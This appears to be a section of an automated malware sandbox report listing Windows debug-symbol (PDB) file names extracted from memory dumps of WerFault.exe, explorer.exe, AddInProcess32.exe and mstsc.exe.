          Source: Binary string: shdocvw.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: WINMMBASE.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: twinapi.pdbg source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: TileControl.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: OneCoreCommonProxyStub.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: PlayToDevice.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: TileDataRepository.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.700089831.0000000005A00000.00000002.00000001.sdmp, explorer.exe, 00000010.00000002.1048482581.00000000070D0000.00000002.00000001.sdmp
          Source: Binary string: msvcp110_win.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
          Source: Binary string: AboveLockAppHost.pdb1SX source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: nsi.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: SndVolSSO.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: winmm.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: TaskFlowUI.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: 5.pdb2R source: WerFault.exe, 0000000A.00000002.761878802.000001EDC4EA8000.00000004.00000020.sdmp
          Source: Binary string: ole32.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: Windows.UI.Core.TextInput.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: provsvc.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: iertutil.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: Windows.UI.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: AppXDeploymentClient.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
          Source: Binary string: dusmapi.pdb%jI source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: \??\C:\Windows.pdb source: WerFault.exe, 0000000A.00000003.746829519.000001EDC4ED0000.00000004.00000001.sdmp
          Source: Binary string: combase.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: Windows.UI.Shell.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: InputSwitch.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: cflapi.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: DataExchange.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: provsvc.pdbuj source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: Windows.Data.Activities.pdbaS source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: Bcp47mrm.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: usermgrcli.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: kernelbase.pdb source: WerFault.exe, 0000000A.00000003.747630209.000001EDC50E0000.00000004.00000040.sdmp
          Source: Binary string: SettingMonitor.pdb:uT source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: Windows.UI.Core.TextInput.pdbIS source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: wininet.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: Windows.UI.Immersive.pdb5SD source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: prnfldr.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: twinapi.appcore.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
          Source: Binary string: nlaapi.pdb0t/ source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: Windows.Networking.Connectivity.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: nsi.pdbRjz source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: ActXPrxy.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: Windows.CloudStore.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: ColorAdapterClient.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: mlang.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: pcacli.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: combase.pdb8 source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: NotificationControllerPS.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: sppc.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: oleacc.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: wevtapi.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: framedynos.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: samcli.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: shell32.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: sspicli.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: UiaManager.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: dsreg.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: Windows.StateRepository.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: ActionCenter.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: SettingSyncCore.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
          Source: Binary string: msoshext.pdb0 source: WerFault.exe, 0000000A.00000003.747320665.000001EDC8062000.00000004.00000001.sdmp
          Source: Binary string: dusmapi.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: cscapi.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
          Source: Binary string: ntasn1.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: d3d11.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: ShellCommonCommonProxyStub.pdbuS source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: vcruntime140.amd64.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
          Source: Binary string: gdi32.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: MobileNetworking.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: WindowsCodecs.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: avrt.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: winmm.pdb{ source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: ShellCommonCommonProxyStub.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: smartscreenps.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
          Source: Binary string: sechost.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: wmiclnt.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: twinui.appcore.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: propsys.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: WindowsInternal.ComposableShell.Experiences.Switcher.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: samlib.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: atlthunk.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: bthprops.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: msctf.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
          Source: Binary string: linkinfo.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: wscinterop.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: win32u.pdb0 source: WerFault.exe, 0000000A.00000003.739016455.000001EDC6E52000.00000004.00000001.sdmp
          Source: Binary string: mscms.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.700089831.0000000005A00000.00000002.00000001.sdmp, WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp, explorer.exe, 00000010.00000002.1048482581.00000000070D0000.00000002.00000001.sdmp
          Source: Binary string: user32.pdb source: WerFault.exe, 0000000A.00000003.738993307.000001EDC6E48000.00000004.00000001.sdmp
          Source: Binary string: bcrypt.pdbn source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: cldapi.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: Windows.UI.Shell.pdbqS source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: dxgi.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: IconCodecService.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: dlnashext.pdbIj source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: WLIDProv.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: UxTheme.pdb source: WerFault.exe, 0000000A.00000003.731495333.000001EDC6EB3000.00000004.00000001.sdmp
          Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: SettingSyncPolicy.pdbQSx source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: winsta.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: sfc_os.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: Windows.Security.Authentication.Web.Core.pdb source: WerFault.exe, 0000000A.00000003.747586781.000001EDC805E000.00000004.00000001.sdmp
          Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: TaskFlowDataEngine.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: WscApi.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: Windows.StateRepositoryBroker.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: Windows.StateRepository.pdb%St source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: ucrtbase.pdb8 source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: davclnt.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: stobject.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
          Source: Binary string: AppResolver.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: dcomp.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: NPSM.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: audioses.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: twinui.appcore.pdbUSd source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: ntmarta.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: UxTheme.pdb0 source: WerFault.exe, 0000000A.00000003.731495333.000001EDC6EB3000.00000004.00000001.sdmp
          Source: Binary string: sapi_onecore.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: ninput.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: StartTileData.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
          Source: Binary string: PortableDeviceTypes.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: LanguageOverlayUtil.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: kernel32.pdb source: WerFault.exe, 0000000A.00000003.740772791.000001EDC777B000.00000004.00000001.sdmp
          Source: Binary string: netprofm.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: sxs.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: pnidui.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: Windows.Internal.Shell.Broker.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: win32u.pdb source: WerFault.exe, 0000000A.00000003.739016455.000001EDC6E52000.00000004.00000001.sdmp
          Source: Binary string: ResourcePolicyClient.pdbMS source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: MrmCoreR.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: thumbcache.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: PhotoMetadataHandler.pdb]Sl source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: srvcli.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: ntdll.pdb0 source: WerFault.exe, 0000000A.00000003.740856862.000001EDC6DF0000.00000004.00000001.sdmp
          Source: Binary string: ExplorerFrame.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: imm32.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: twinui.pcshell.pdb!SH source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: cdp.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: profapi.pdba source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: InputHost.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: ExplorerFrame.pdbmS< source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: ntshrui.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: coml2.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: drprov.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: IdStore.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: wpnapps.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: PortableDeviceApi.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: UserMgrProxy.pdbSP source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000001.00000002.722744884.0000000001290000.00000040.00000001.sdmp, mstsc.exe, 00000006.00000002.1032811979.0000000004750000.00000040.00000001.sdmp
          Source: Binary string: Windows.Shell.BlueLightReduction.pdb source: WerFault.exe, 0000000A.00000003.747586781.000001EDC805E000.00000004.00000001.sdmp
          Source: Binary string: TaskFlowDataEngine.pdbeS4 source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: propsys.pdbb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: davhlpr.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: dlnashext.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: Deviceovs.pdb source: WerFault.exe, 0000000A.00000002.761878802.000001EDC4EA8000.00000004.00000020.sdmp
          Source: Binary string: EhStorShell.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: XmlLite.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe, mstsc.exe, 00000006.00000002.1034631298.0000000004C7F000.00000004.00000001.sdmp
          Source: Binary string: WorkFoldersShell.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: batmeter.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: cscui.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: DWrite.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: ResourcePolicyClient.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: MFPLAT.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: SyncCenter.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: ApplicationFrame.pdb=SL source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: ncrypt.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: secur32.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: UxTheme.pdbv source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: cryptsp.pdbh source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: netutils.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: kernel32.pdb0 source: WerFault.exe, 0000000A.00000003.726046312.000001EDC6DF6000.00000004.00000001.sdmp
          Source: Binary string: Bcp47Langs.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: rtworkq.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: ActionCenter.pdbASh source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: Windows.StateRepositoryClient.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
          Source: Binary string: rpcrt4.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: ExecModelProxy.pdbES source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: shcore.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: explorer.pdb source: WerFault.exe, 0000000A.00000003.725996524.000001EDC6DEA000.00000004.00000001.sdmp
          Source: Binary string: twinui.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: Windows.Internal.Shell.Broker.pdbf source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: NPSMDesktopProvider.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: MMDevAPI.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: Windows.UI.Immersive.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: WPDShServiceObj.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: userenv.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: capauthz.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
          Source: Binary string: hcproviders.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: nlaapi.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: setupapi.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: Wer.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: windows.ui.xaml.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: user32.pdb0 source: WerFault.exe, 0000000A.00000003.738993307.000001EDC6E48000.00000004.00000001.sdmp
          Source: Binary string: wincorlib.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: winhttp.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: ntlanman.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: mstsc.pdbGCTL source: AddInProcess32.exe, 00000001.00000002.724998329.0000000002D60000.00000040.00000001.sdmp
          Source: Binary string: IEProxy.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: devobj.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: gdi32full.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
          Source: Binary string: policymanager.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
          Source: Binary string: gdiplus.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: WPDShServiceObj.pdb&uX source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
          Source: Binary string: RmClient.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
          Source: Binary string: StructuredQuery.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
          Source: Binary string: UserMgrProxy.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
